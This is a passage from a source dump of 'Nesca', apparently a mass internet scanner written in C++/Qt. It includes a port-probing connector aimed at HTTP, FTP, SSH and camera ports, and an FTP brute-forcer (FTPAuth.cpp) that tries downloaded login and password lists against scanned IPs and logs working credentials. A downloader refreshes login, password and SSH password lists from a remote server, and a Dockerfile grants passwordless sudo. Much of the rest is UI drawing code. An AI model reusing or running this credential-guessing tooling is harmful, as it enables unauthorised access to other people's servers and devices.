"https://%s:%d", ip, port); 474 | //strcpy(tempIp, "https://"); 475 | } 476 | else if (21 == port) { 477 | //strcpy(tempIp, "ftp://"); 478 | sprintf(tempIp, "ftp://%s:%d", ip, port); 479 | //sprintf(tempIp, "%s", ip); 480 | } 481 | /*else if (554 == port) { 482 | sprintf(tempIp, "rtsp://%s:%d", ip, port); 483 | }*/ 484 | else { 485 | //strcpy(tempIp, "http://"); 486 | sprintf(tempIp, "http://%s:%d", ip, port); 487 | } 488 | //strncat(tempIp, ip, sz > 96 ? 96 : sz); 489 | 490 | if (port != 37777 && port != 8000 && port != 34567 && port != 9000){ 491 | if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer); //SSH 492 | else if (21 == port) size = nConnect(ip, port, &buffer); 493 | else size = nConnect(tempIp, port, &buffer); 494 | 495 | if (size > 0) 496 | { 497 | ++Alive;//ME2 498 | ++found;//PieStat 499 | Lexems lx; 500 | lx.filler(tempIp, ip, port, &buffer, size, &lx); 501 | } 502 | else if (size == -2) return -2; 503 | } else { 504 | if (portCheck(ip, port)) { 505 | ++Alive;//ME2 506 | ++found;//PieStat 507 | Lexems lx; 508 | lx.filler(ip, ip, port, &buffer, size, &lx); 509 | }; 510 | } 511 | return 0; 512 | } 513 | -------------------------------------------------------------------------------- /Connector.h: -------------------------------------------------------------------------------- 1 | #ifndef CONNECTOR_H 2 | #define CONNECTOR_H 3 | 4 | #include "STh.h" 5 | #include "BruteUtils.h" 6 | 7 | #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) 8 | #include 9 | #include 10 | #pragma comment(lib, "iphlpapi.lib") 11 | //#pragma comment(lib,"libcurldll.a") 12 | #endif 13 | 14 | #include 15 | 16 | #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) 17 | #define MUTEX_TYPE HANDLE 18 | #define MUTEX_SETUP(x) (x) = CreateMutex(NULL, FALSE, NULL) 19 | #define MUTEX_CLEANUP(x) CloseHandle(x) 20 | #define MUTEX_LOCK(x) WaitForSingleObject((x), INFINITE) 21 | #define MUTEX_UNLOCK(x) ReleaseMutex(x) 22 | #define THREAD_ID GetCurrentThreadId() 23 | #else 24 | #include 25 | #define MUTEX_TYPE pthread_mutex_t 26 | #define MUTEX_SETUP(x) pthread_mutex_init(&(x), NULL) 27 | #define MUTEX_CLEANUP(x) pthread_mutex_destroy(&(x)) 28 | #define MUTEX_LOCK(x) pthread_mutex_lock(&(x)) 29 | #define MUTEX_UNLOCK(x) pthread_mutex_unlock(&(x)) 30 | #define THREAD_ID pthread_self() 31 | #endif 32 | 33 | 34 | class Connector { 35 | 36 | public: 37 | int nConnect(const char* ip, const int port, std::string *buffer, 38 | const char *postData = NULL, 39 | const std::vector *customHeaders = NULL, 40 | const std::string *lpString = NULL, 41 | bool digestMode = false, 42 | bool isRTSP = false, bool isDigest = true); 43 | int connectToPort(char *ip, int port); 44 | int checkIsDigestRTSP(const char *ip, std::string *buffer); 45 | }; 46 | 47 | #endif // CONNECTOR_H 48 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | # Minimal docker container to build Nesca 2 | 3 | FROM ubuntu:14.04 4 | MAINTAINER Pantyusha 5 | 6 | ENV DEBIAN_FRONTEND noninteractive 7 | ENV QT_PATH /opt/Qt 8 | ENV QT_DESKTOP $QT_PATH/5.4/gcc_64 9 | ENV PATH $QT_DESKTOP/bin:$PATH 10 | 11 | # Install updates & requirements: 12 | # * git, openssh-client, ca-certificates - clone & build 13 | # * curl, p7zip - to download & unpack Qt bundle 14 | # * build-essential, pkg-config, libgl1-mesa-dev - basic Qt build requirements 15 | # * libsm6, libice6, libxext6, libxrender1, libfontconfig1 - dependencies of Qt bundle run-file 16 | RUN apt-get -qq update && apt-get -qq dist-upgrade && apt-get install -qq -y --no-install-recommends \ 17 | git \ 18 | wget \ 19 | make \ 20 | curl \ 21 | openssh-client \ 22 | ca-certificates \ 23 | p7zip \ 24 | build-essential \ 25 | pkg-config \ 26 | libgl1-mesa-dev \ 27 | libsm6 \ 28 | libssh-dev \ 29 | libice6 \ 30 | libxext6 \ 31 | libxrender1 \ 32 | libfontconfig1 \ 33 | && apt-get -qq clean 34 | 35 | # Update curl 36 | RUN apt-get -qq build-dep -y curl \ 37 | && wget http://curl.haxx.se/download/curl-7.50.2.tar.bz2 \ 38 | && tar -xvjf curl-7.50.2.tar.bz2 \ 39 | && cd curl-7.50.2 \ 40 | && ./configure \ 41 | && make install 42 | 43 | # Install Qt 5.4.2 44 | RUN mkdir -p /tmp/qt \ 45 | && curl -Lo /tmp/qt/installer.run 'https://download.qt.io/archive/qt/5.4/5.4.2/qt-opensource-linux-x64-5.4.2.run' \ 46 | && chmod 755 /tmp/qt/installer.run && /tmp/qt/installer.run --dump-binary-data -o /tmp/qt/data \ 47 | && mkdir $QT_PATH && cd $QT_PATH \ 48 | && 7zr x /tmp/qt/data/qt.54.gcc_64/5.4.2-0qt5_essentials.7z > /dev/null \ 49 | && 7zr x /tmp/qt/data/qt.54.gcc_64/5.4.2-0qt5_addons.7z > /dev/null \ 50 | && 7zr x /tmp/qt/data/qt.54.gcc_64/5.4.2-0icu_53_1_ubuntu_11_10_64.7z > /dev/null \ 51 | && /tmp/qt/installer.run --runoperation QtPatch linux $QT_DESKTOP qt5 \ 52 | && rm -rf /tmp/qt 53 | 54 | # Install multimedia dependencies 55 | RUN apt-get -qq install -y --no-install-recommends qtmultimedia5-dev 56 | 57 | # Download Nesca 58 | RUN cd /tmp && git clone https://github.com/netstalking-core/nesca.git 59 | 60 | # Compile 61 | RUN cd /tmp/nesca && qmake && make 62 | 63 | # Add group & user 64 | RUN groupadd -r user && useradd --create-home --gid user user && echo 'user ALL=NOPASSWD: ALL' > /etc/sudoers.d/user 65 | 66 | # Move to user dir 67 | RUN mv /tmp/nesca /home/user/ 68 | 69 | USER user 70 | WORKDIR /home/user/nesca 71 | ENV HOME /home/user 72 | 73 | ENTRYPOINT ["/home/user/nesca/nesca"] 74 | -------------------------------------------------------------------------------- /DrawerTh_GridQoSScanner.cpp: -------------------------------------------------------------------------------- 1 | #include "DrawerTh_GridQoSScanner.h" 2 | 3 | void DrawerTh_GridQoSScanner::doEmitAddLine() 4 | { 5 | emit dtGridQoS->sAddLine(); 6 | }; 7 | 8 | void DrawerTh_GridQoSScanner::run() 9 | { 10 | while(QoSScanFlag) 11 | { 12 | if(stt->isRunning() == true) 13 | { 14 | if(widgetIsHidden == false && tray->isVisible() == false) 15 | { 16 | ++QoSStep; 17 | emit dtGridQoS->doEmitAddLine(); 18 | }; 19 | }; 20 | msleep(2000); 21 | }; 22 | }; -------------------------------------------------------------------------------- /DrawerTh_GridQoSScanner.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef DRAWERTH_GRIDQOSSCANNER_H 3 | #define DRAWERTH_GRIDQOSSCANNER_H 4 | 5 | #include "STh.h" 6 | 7 | class DrawerTh_GridQoSScanner : public QThread 8 | { 9 | Q_OBJECT 10 | 11 | public: 12 | public: signals: void sAddLine(); 13 | 14 | public: 15 | void doEmitAddLine(); 16 | 17 | protected: 18 | void run(); 19 | }; 20 | 21 | extern DrawerTh_GridQoSScanner *dtGridQoS; 22 | #endif // DRAWERTH_GRIDQOSSCANNER_H 23 | -------------------------------------------------------------------------------- /DrawerTh_HorNet.cpp: -------------------------------------------------------------------------------- 1 | #include "DrawerTh_HorNet.h" 2 | 3 | void DrawerTh_HorNet::run() 4 | { 5 | qsrand (QDateTime::currentMSecsSinceEpoch()); 6 | int factor = 0; 7 | 8 | int gWidth = ui->graphicLog->width(); 9 | int gHeight = ui->graphicLog->height(); 10 | 11 | dtHN->doEmitionAddDelimLines(); 12 | 13 | while(ME2ScanFlag) 14 | { 15 | if(widgetIsHidden == false && tray->isVisible() == false) 16 | { 17 | if (++factor > 9) factor = 0; 18 | dtHN->doEmitionDrawGrid(); 19 | 20 | for(int i = 0; i < gHeight; i += 10) 21 | { 22 | QApplication::processEvents(); 23 | dtHN->doEmitionAddLine(0, i + factor, gWidth, i + factor); 24 | QApplication::processEvents(); 25 | }; 26 | }; 27 | msleep(200); 28 | }; 29 | }; 30 | 31 | void DrawerTh_HorNet::doEmitionDrawGrid() 32 | { 33 | emit dtHN->sDrawGrid(); 34 | }; 35 | void DrawerTh_HorNet::doEmitionAddLine(int x1, int y1, int x2, int y2) 36 | { 37 | emit dtHN->sAddLine(x1, y1, x2, y2); 38 | }; 39 | void DrawerTh_HorNet::doEmitionAddDelimLines() 40 | { 41 | emit dtHN->sAddDelimLines(); 42 | }; -------------------------------------------------------------------------------- /DrawerTh_HorNet.h: -------------------------------------------------------------------------------- 1 | #ifndef DRAWERTH_HORNET_H 2 | #define DRAWERTH_HORNET_H 3 | 4 | #include "nesca_3.h" 5 | 6 | class DrawerTh_HorNet : public QThread 7 | { 8 | Q_OBJECT 9 | 10 | public: 11 | static void doEmitionDrawGrid(); 12 | static void doEmitionAddLine(int x1, int y1, int x2, int y2); 13 | static void doEmitionAddDelimLines(); 14 | 15 | public: signals: void sAddDelimLines(); 16 | public: signals: void sAddLine(int, int, int, int); 17 | public: signals: void sDrawGrid(); 18 | 19 | protected: 20 | void run(); 21 | }; 22 | 23 | extern DrawerTh_HorNet *dtHN; 24 | #endif // DRAWERTH_HORNET_H 25 | -------------------------------------------------------------------------------- /DrawerTh_ME2Scanner.cpp: -------------------------------------------------------------------------------- 1 | #include "DrawerTh_ME2Scanner.h" 2 | #include "STh.h" 3 | #include "externData.h" 4 | #include "WebformWorker.h" 5 | #include "MainStarter.h" 6 | 7 | QList DrawerTh_ME2Scanner::itmList; 8 | QVector DrawerTh_ME2Scanner::polyVect; 9 | int DrawerTh_ME2Scanner::vecSize; 10 | 11 | void DrawerTh_ME2Scanner::doEmitDrawTextPlacers() 12 | { 13 | emit dtME2->sDrawTextPlacers(); 14 | } 15 | 16 | void DrawerTh_ME2Scanner::doEmitionAddPolyLine() 17 | { 18 | emit dtME2->sAddPolyLine(); 19 | } 20 | 21 | int MakePolygonLine(int gWidth) 22 | { 23 | while (!DrawerTh_ME2Scanner::polyVect.empty()) Sleep(100); 24 | int x = 0; 25 | int tx = 0; 26 | int xtx = 0; 27 | QPointF qp(0, ME2YPOS); 28 | DrawerTh_ME2Scanner::polyVect.append(qp); 29 | int fact1 = 0, 30 | fact2 = 0, 31 | fact3 = 0, 32 | fact4 = 0, 33 | fact5 = 0, 34 | fact6 = 0, 35 | fact7 = 0; 36 | 37 | bool state = stt->isRunning(); 38 | int activityVal = log(1 + Activity)/3 + 2; 39 | for(int i = 1; i < 136; ++i) 40 | { 41 | x = qrand() % 4 + i; 42 | xtx = x + tx; 43 | if(xtx > 1 && xtx < 31) 44 | { 45 | qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - camerasC1 * 2 - fact1 : ME2YPOS); 46 | if (camerasC1 > 0) 47 | { 48 | if(xtx < 16 ) fact1+=2; 49 | else fact1-=2; 50 | }; 51 | } 52 | 53 | if(xtx > 34 && xtx < 72) 54 | { 55 | qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - /*WF*/0 * 2 - fact2 : ME2YPOS); 56 | 57 | if(/*WF*/0 > 0) 58 | { 59 | if(xtx < 52 ) fact2+=2; 60 | else fact2-=2; 61 | }; 62 | } 63 | 64 | if(xtx > 74 && xtx < 112) 65 | { 66 | qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - baCount * 2 - fact3 : ME2YPOS); 67 | 68 | if (baCount > 0) 69 | { 70 | if(xtx < 92 ) fact3+=2; 71 | else fact3-=2; 72 | }; 73 | } 74 | 75 | if(xtx > 114 && xtx < 152) 76 | { 77 | qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - other * 2 - fact4 : ME2YPOS); 78 | 79 | if (other > 0) 80 | { 81 | if(xtx < 132 ) fact4+=2; 82 | else fact4-=2; 83 | }; 84 | } 85 | 86 | if(xtx > 154 && xtx < 192) 87 | { 88 | qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - Overl * 2 - fact5 : ME2YPOS); 89 | 90 | if(Overl > 0) 91 | { 92 | if(xtx < 172 ) fact5+=2; 93 | else fact5-=2; 94 | }; 95 | } 96 | 97 | if(xtx > 194 && xtx < 232) 98 | { 99 | qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - /*Lowl*/0 * 2 - fact6 : ME2YPOS); 100 | 101 | if(/*Lowl*/0 > 0) 102 | { 103 | if(xtx < 212 ) fact6+=2; 104 | else fact6-=2; 105 | }; 106 | } 107 | 108 | if(xtx > 234 && xtx < 278) 109 | { 110 | qp = QPointF(xtx, state ? qrand() % activityVal + ME2YPOS - Alive * 2 - fact7 : ME2YPOS); 111 | 112 | if(Alive > 0) 113 | { 114 | if(xtx < 254 ) fact7+=1; 115 | else fact7-=1; 116 | }; 117 | }; 118 | 119 | DrawerTh_ME2Scanner::polyVect.append(qp); 120 | tx = x; 121 | }; 122 | 123 | camerasC1 = 0; 124 | //WF = 0; 125 | baCount = 0; 126 | filtered = 0; 127 | Overl = 0; 128 | //Lowl = 0; 129 | Alive = 0; 130 | other = 0; 131 | 132 | DrawerTh_ME2Scanner::polyVect.append(QPointF(gWidth, ME2YPOS)); 133 | return DrawerTh_ME2Scanner::polyVect.size(); 134 | } 135 | 136 | void DrawerTh_ME2Scanner::run() 137 | { 138 | int gWidth = ui->graphicLog->width(); 139 | dtME2->doEmitDrawTextPlacers(); 140 | 141 | while(ME2ScanFlag) 142 | { 143 | if (widgetIsHidden == false && tray->isVisible() == false) 144 | { 145 | if (itmList.count() < 39) { 146 | vecSize = MakePolygonLine(gWidth); 147 | dtME2->doEmitionAddPolyLine(); 148 | } 149 | } 150 | else 151 | { 152 | msleep(1000); 153 | camerasC1 = 0; 154 | //WF = 0; 155 | baCount = 0; 156 | filtered = 0; 157 | Overl = 0; 158 | //Lowl = 0; 159 | Alive = 0; 160 | other = 0; 161 | }; 162 | msleep(100); 163 | }; 164 | 165 | itmList.clear(); 166 | } 167 | -------------------------------------------------------------------------------- /DrawerTh_ME2Scanner.h: -------------------------------------------------------------------------------- 1 | #ifndef DRAWERTH_ME2SCANNER_H 2 | #define DRAWERTH_ME2SCANNER_H 3 | 4 | #define ME2YPOS 97 5 | #define ME2GRADPOS 10 6 | #include "STh.h" 7 | 8 | class DrawerTh_ME2Scanner : public QThread 9 | { 10 | Q_OBJECT 11 | 12 | public: 13 | static int vecSize; 14 | static QList itmList; 15 | static QVector polyVect; 16 | 17 | static void doEmitionAddPolyLine(); 18 | static void doEmitDrawTextPlacers(); 19 | 20 | public: signals: void sAddPolyLine(); 21 | public: signals: void sDrawTextPlacers(); 22 | 23 | protected: 24 | void run(); 25 | }; 26 | extern DrawerTh_ME2Scanner *dtME2; 27 | #endif // DRAWERTH_ME2SCANNER_H 28 | -------------------------------------------------------------------------------- /DrawerTh_QoSScanner.cpp: -------------------------------------------------------------------------------- 1 | #include "DrawerTh_QoSScanner.h" 2 | #include "STh.h" 3 | #include "externData.h" 4 | 5 | int DrawerTh_QoSScanner::MaxDataVal = 1; 6 | 7 | void DrawerTh_QoSScanner::run() 8 | { 9 | while(QoSScanFlag) 10 | { 11 | if(stt->isRunning() == true && widgetIsHidden == false && tray->isVisible() == false && QOSWait == false) 12 | { 13 | lstOfLabels.clear(); 14 | lstOfLabels.append(Alive); 15 | lstOfLabels.append(camerasC1); 16 | //lstOfLabels.append(WF); 17 | lstOfLabels.append(other); 18 | //lstOfLabels.append(Lowl); 19 | lstOfLabels.append(baCount); 20 | lstOfLabels.append(Overl); 21 | lstOfLabels.append(ssh); 22 | 23 | QList lstOfLabelsCopy = lstOfLabels; 24 | qSort(lstOfLabelsCopy.begin(), lstOfLabelsCopy.end(), qGreater()); 25 | if(lstOfLabelsCopy[0] > MaxDataVal) MaxDataVal = lstOfLabelsCopy[0]; 26 | 27 | dtQoS->doEmitionAddLine(); 28 | } 29 | else 30 | { 31 | msleep(500); 32 | camerasC1 = 0; 33 | //WF = 0; 34 | baCount = 0; 35 | filtered = 0; 36 | Overl = 0; 37 | //Lowl = 0; 38 | Alive = 0; 39 | other = 0; 40 | ssh = 0; 41 | }; 42 | 43 | camerasC1 = 0; 44 | //WF = 0; 45 | baCount = 0; 46 | filtered = 0; 47 | Overl = 0; 48 | //Lowl = 0; 49 | Alive = 0; 50 | other = 0; 51 | ssh = 0; 52 | msleep(2000); 53 | }; 54 | } 55 | 56 | void DrawerTh_QoSScanner::doEmitionAddLine() 57 | { 58 | emit dtQoS->sAddLine(); 59 | } 60 | -------------------------------------------------------------------------------- /DrawerTh_QoSScanner.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef DRAWERTH_QOSSCANNER_H 3 | #define DRAWERTH_QOSSCANNER_H 4 | 5 | #include "nesca_3.h" 6 | 7 | class DrawerTh_QoSScanner : public QThread 8 | { 9 | Q_OBJECT 10 | 11 | public: 12 | static int MaxDataVal; 13 | public: 14 | static void doEmitionAddLine(); 15 | 16 | public: signals: void sAddLine(); 17 | 18 | protected: 19 | void run(); 20 | }; 21 | 22 | extern DrawerTh_QoSScanner *dtQoS; 23 | #endif // DRAWERTH_QOSSCANNER_H 24 | -------------------------------------------------------------------------------- /DrawerTh_VoiceScanner.cpp: -------------------------------------------------------------------------------- 1 | #include "DrawerTh_VoiceScanner.h" 2 | #include "externData.h" 3 | 4 | void DrawerTh_VoiceScanner::doEmitAddLine() 5 | { 6 | emit vsTh->sAddLine(); 7 | }; 8 | void DrawerTh_VoiceScanner::doEmitDrawGrid(int factor) 9 | { 10 | emit vsTh->sDrawGrid(factor); 11 | }; 12 | void DrawerTh_VoiceScanner::doEmitDrawTextPlacers() 13 | { 14 | emit vsTh->sDrawTextPlacers(); 15 | } 16 | 17 | void makeVoiceLine(int Al, int An, int Bd, int Sp, int Lo, int var, int Ovl, int WF, int SSH) 18 | { 19 | if(vAlivLst.size() < 140) 20 | { 21 | if(Al > 0) vAlivLst.push_back((Al + 1)*10); 22 | } 23 | else 24 | { 25 | vAlivLst.pop_front(); 26 | if(Al > 0) vAlivLst.push_back((Al + 1)*10); 27 | }; 28 | 29 | if(vAnomLst.size() < 140) 30 | { 31 | if(An > 0) vAnomLst.push_back((An + 1)*10); 32 | } 33 | else 34 | { 35 | vAnomLst.pop_front(); 36 | if(An > 0) vAnomLst.push_back((An + 1)*10); 37 | }; 38 | 39 | if(vWFLst.size() < 140) 40 | { 41 | if(Bd > 0) vWFLst.push_back((Bd + 1)*10); 42 | } 43 | else 44 | { 45 | vWFLst.pop_front(); 46 | if(Bd > 0) vWFLst.push_back((Bd + 1)*10); 47 | }; 48 | 49 | if(vSuspLst.size() < 140) 50 | { 51 | if(Sp > 0) vSuspLst.push_back((Sp + 1)*10); 52 | } 53 | else 54 | { 55 | vSuspLst.pop_front(); 56 | if(Sp > 0) vSuspLst.push_back((Sp + 1)*10); 57 | }; 58 | 59 | if(vLowlLst.size() < 140) 60 | { 61 | if(Lo > 0) vLowlLst.push_back((Lo + 1)*10); 62 | } 63 | else 64 | { 65 | vLowlLst.pop_front(); 66 | if(Lo > 0) vLowlLst.push_back((Lo + 1)*10); 67 | }; 68 | 69 | if(vLowlLst.size() < 140) 70 | { 71 | if(var > 0) vBALst.push_back((var + 1)*10); 72 | } 73 | else 74 | { 75 | vBALst.pop_front(); 76 | if(var > 0) vBALst.push_back((var + 1)*10); 77 | }; 78 | 79 | if(vOvrlLst.size() < 140) 80 | { 81 | if(Ovl > 0) vOvrlLst.push_back((Ovl + 1)*10); 82 | } 83 | else 84 | { 85 | vOvrlLst.pop_front(); 86 | if(Ovl > 0) vOvrlLst.push_back((Ovl + 1)*10); 87 | }; 88 | 89 | if(vSSHLst.size() < 140) 90 | { 91 | if(SSH > 0) vSSHLst.push_back((SSH + 1)*10); 92 | } 93 | else 94 | { 95 | vSSHLst.pop_front(); 96 | if(SSH > 0) vSSHLst.push_back((SSH + 1)*10); 97 | }; 98 | }; 99 | void DrawerTh_VoiceScanner::run() 100 | { 101 | vsTh->doEmitDrawGrid(150); 102 | vsTh->doEmitDrawTextPlacers(); 103 | while(VoiceScanFlag) 104 | { 105 | if(widgetIsHidden == false && tray->isVisible() == false) 106 | { 107 | makeVoiceLine(Alive, camerasC1, 0, other, 0, baCount, Overl, 0, ssh); 108 | Alive = 0; 109 | camerasC1 = 0; 110 | //WF = 0; 111 | filtered = 0; 112 | //Lowl = 0; 113 | baCount = 0; 114 | Overl = 0; 115 | other = 0; 116 | ssh = 0; 117 | 118 | vsTh->doEmitAddLine(); 119 | msleep(150); 120 | } 121 | else 122 | { 123 | msleep(500); 124 | Alive = 0; 125 | camerasC1 = 0; 126 | //WF = 0; 127 | filtered = 0; 128 | //Lowl = 0; 129 | baCount = 0; 130 | Overl = 0; 131 | other = 0; 132 | ssh = 0; 133 | }; 134 | }; 135 | }; 136 | -------------------------------------------------------------------------------- /DrawerTh_VoiceScanner.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef DRAWERTH_VOICESCANNER_H 3 | #define DRAWERTH_VOICESCANNER_H 4 | 5 | #include "nesca_3.h" 6 | 7 | class DrawerTh_VoiceScanner : public QThread 8 | { 9 | Q_OBJECT 10 | 11 | public: 12 | public: signals: void sAddLine(); 13 | public: signals: void sDrawGrid(int factor); 14 | public: signals: void sDrawTextPlacers(); 15 | public: 16 | void doEmitAddLine(); 17 | void doEmitDrawGrid(int factor); 18 | void doEmitDrawTextPlacers(); 19 | protected: 20 | void run(); 21 | }; 22 | extern DrawerTh_VoiceScanner *vsTh; 23 | #endif // DRAWERTH_VOICESCANNER_H 24 | -------------------------------------------------------------------------------- /Eurostile.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netstalking-core/nesca/469cdcb04cd1a7130a56974b1c85961b88b8eecc/Eurostile.ttf -------------------------------------------------------------------------------- /FTPAuth.cpp: -------------------------------------------------------------------------------- 1 | #include "FTPAuth.h" 2 | #include "FileUpdater.h" 3 | 4 | bool FTPA::checkOutput(const string *buffer) { 5 | if(Utils::ustrstr(*buffer, "230") != -1) { 6 | 7 | return true; 8 | } 9 | 10 | return false; 11 | } 12 | 13 | lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) { 14 | string buffer; 15 | string lpString; 16 | lopaStr lps = {"UNKNOWN", "", ""}; 17 | 18 | int res = 0; 19 | int passCounter = 0; 20 | int rowIndex = -1; 21 | 22 | char login[32] = {0}; 23 | char pass[32] = {0}; 24 | 25 | for (int i = 0; i < MaxFTPLogin; ++i) 26 | { 27 | if(!globalScanFlag) return lps; 28 | FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; }); 29 | strcpy(login, ftpLoginLst[i]); 30 | if (strlen(login) <= 1) continue; 31 | 32 | for (int j = 0; j < MaxFTPPass; ++j) 33 | { 34 | if(!globalScanFlag) return lps; 35 | FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; }); 36 | strcpy(pass, ftpPassLst[j]); 37 | if (strlen(pass) <= 1) continue; 38 | 39 | lpString = string(login) + ":" + string(pass); 40 | 41 | Connector con; 42 | res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString); 43 | if (res == -2) { 44 | rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); 45 | return lps; 46 | } 47 | else if (res != -1) { 48 | if (buffer.find("syslog") != -1 || buffer.find("CFG-PAGE") != -1 49 | || buffer.find("L3_default") != -1 50 | || buffer.find("avpport") != -1 51 | ) { 52 | if (gNegDebugMode) { 53 | stt->doEmitionDebugFoundData("Ignoring " + QString(ip) + " (syslog or CFG-PAGE or L3_default or avpport)"); 54 | } 55 | return lps; 56 | } 57 | int rootDir = std::count(buffer.begin(), buffer.end(), '.'); 58 | ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n'); 59 | 60 | if (3 == rootDir && 2 == ps->directoryCount) { 61 | if (gNegDebugMode) { 62 | stt->doEmitionDebugFoundData("Ignoring " + QString(ip) + " (empty)"); 63 | } 64 | return lps; 65 | } 66 | 67 | if (3 == ps->directoryCount || 1 == ps->directoryCount) { 68 | if (-1 != buffer.find("pub") || -1 != buffer.find("incoming")) { 69 | if (gNegDebugMode) { 70 | stt->doEmitionDebugFoundData("Ignoring " + QString(ip) + " (pub or incoming)"); 71 | } 72 | return lps; 73 | } 74 | } 75 | 76 | if (!globalScanFlag) return lps; 77 | strcpy(lps.login, login); 78 | strcpy(lps.pass, pass); 79 | 80 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex); 81 | 82 | return lps; 83 | }; 84 | 85 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%", rowIndex); 86 | ++passCounter; 87 | Sleep(50); 88 | } 89 | } 90 | 91 | rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); 92 | return lps; 93 | } 94 | 95 | lopaStr FTPA::FTPLobby(const char *ip, const int port, PathStr *ps) { 96 | if(gMaxBrutingThreads > 0) { 97 | while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); 98 | 99 | ++baCount; 100 | ++BrutingThrds; 101 | stt->doEmitionUpdateArc(gTargets); 102 | const lopaStr &lps = FTPBrute(ip, port, ps); 103 | --BrutingThrds; 104 | 105 | return lps; 106 | } else { 107 | lopaStr lps = {"UNKNOWN", "", ""}; 108 | return lps; 109 | } 110 | } 111 | -------------------------------------------------------------------------------- /FTPAuth.h: -------------------------------------------------------------------------------- 1 | #ifndef FTPAUTH_H 2 | #define FTPAUTH_H 3 | 4 | #include "Utils.h" 5 | #include "Connector.h" 6 | #include "externData.h" 7 | #include "mainResources.h" 8 | 9 | class FTPA { 10 | private: 11 | static bool checkOutput(const string *buffer); 12 | static lopaStr FTPBrute(const char *ip, const int port, PathStr *ps); 13 | 14 | public: 15 | static lopaStr FTPLobby(const char *ip, const int port, PathStr *ps); 16 | }; 17 | 18 | #endif // FTPAUTH_H 19 | -------------------------------------------------------------------------------- /FileDownloader.cpp: -------------------------------------------------------------------------------- 1 | #include "FileDownloader.h" 2 | #include "mainResources.h" 3 | #include "fstream" 4 | #include 5 | 6 | std::string FileDownloader::lastModifiedNeg = ""; 7 | std::string FileDownloader::lastModifiedL = ""; 8 | std::string FileDownloader::lastModifiedP = ""; 9 | std::string FileDownloader::lastModifiedSSH = ""; 10 | std::string FileDownloader::lastModifiedWFL = ""; 11 | std::string FileDownloader::lastModifiedWFP = ""; 12 | 13 | std::string getLM(std::string *buffer) { 14 | 15 | std::size_t pos1 = buffer->find("Last-Modified:"); 16 | if(pos1 == std::string::npos) { 17 | stt->doEmitionFoundData("Cannot find Last-Modified."); 18 | return ""; 19 | } 20 | int pos2 = buffer->find("\r\n", pos1); 21 | if(pos2 == std::string::npos) { 22 | stt->doEmitionFoundData("Weird reply."); 23 | return ""; 24 | } 25 | 26 | std::string res = buffer->substr(pos1 + 15, pos2 - pos1 - 15); 27 | return res; 28 | } 29 | 30 | void checkWeb(const char *fileName, std::string *oldLM) { 31 | std::string buffer; 32 | Connector con; 33 | con.nConnect(std::string("http://nesca.d3w.org/files/" + std::string(fileName)).c_str(), 80, &buffer); 34 | 35 | const std::string &lm = getLM(&buffer); 36 | if(lm.size() == 0) return; 37 | 38 | if(lm.compare(*oldLM) != 0) { 39 | *oldLM = lm; 40 | std::string res(buffer.substr(buffer.find("\r\n\r\n") + 4).c_str()); 41 | res.erase(std::remove(res.begin(), res.end(), '\r'), res.end()); 42 | std::ofstream out(fileName); 43 | out << std::string(res); 44 | out.close(); 45 | 46 | stt->doEmitionFoundData("File " + QString(fileName) + " downloaded."); 47 | } 48 | } 49 | 50 | void FileDownloader::checkWebFiles() { 51 | while (true) { 52 | checkWeb(NEGATIVE_FN, &lastModifiedNeg); 53 | checkWeb(LOGIN_FN, &lastModifiedL); 54 | checkWeb(PASS_FN, &lastModifiedP); 55 | checkWeb(SSH_PASS_FN, &lastModifiedSSH); 56 | checkWeb(WF_LOGIN_FN, &lastModifiedWFL); 57 | checkWeb(WF_PASS_FN, &lastModifiedWFP); 58 | Sleep(600000); 59 | } 60 | } 61 | 62 | -------------------------------------------------------------------------------- /FileDownloader.h: -------------------------------------------------------------------------------- 1 | #ifndef FILEDOWNLOADER_H 2 | #define FILEDOWNLOADER_H 3 | 4 | #include "Connector.h" 5 | 6 | class FileDownloader { 7 | private: 8 | static std::string lastModifiedNeg; 9 | static std::string lastModifiedL; 10 | static std::string lastModifiedP; 11 | static std::string lastModifiedSSH; 12 | static std::string lastModifiedWFL; 13 | static std::string lastModifiedWFP; 14 | public: 15 | static std::string lastModified; 16 | static void checkWebFiles(); 17 | }; 18 | 19 | #endif // FILEDOWNLOADER_H 20 | -------------------------------------------------------------------------------- /FileUpdater.cpp: -------------------------------------------------------------------------------- 1 | #include "FileUpdater.h" 2 | #include "externFunctions.h" 3 | #include "STh.h" 4 | #include "mainResources.h" 5 | #include "MainStarter.h" 6 | 7 | char **loginLst, **passLst; 8 | char **wfLoginLst, **wfPassLst; 9 | char **ftpLoginLst, **ftpPassLst; 10 | char **sshlpLst; 11 | 12 | bool FileUpdater::running = false; 13 | long FileUpdater::oldNegLstSize = 0; 14 | long FileUpdater::oldLoginLstSize = 0; 15 | long FileUpdater::oldPassLstSize = 0; 16 | long FileUpdater::oldSSHLstSize = 0; 17 | long FileUpdater::oldWFLoginLstSize = 0; 18 | long FileUpdater::oldWFPassLstSize = 0; 19 | long FileUpdater::oldFTPLoginLstSize = 0; 20 | long FileUpdater::oldFTPPassLstSize = 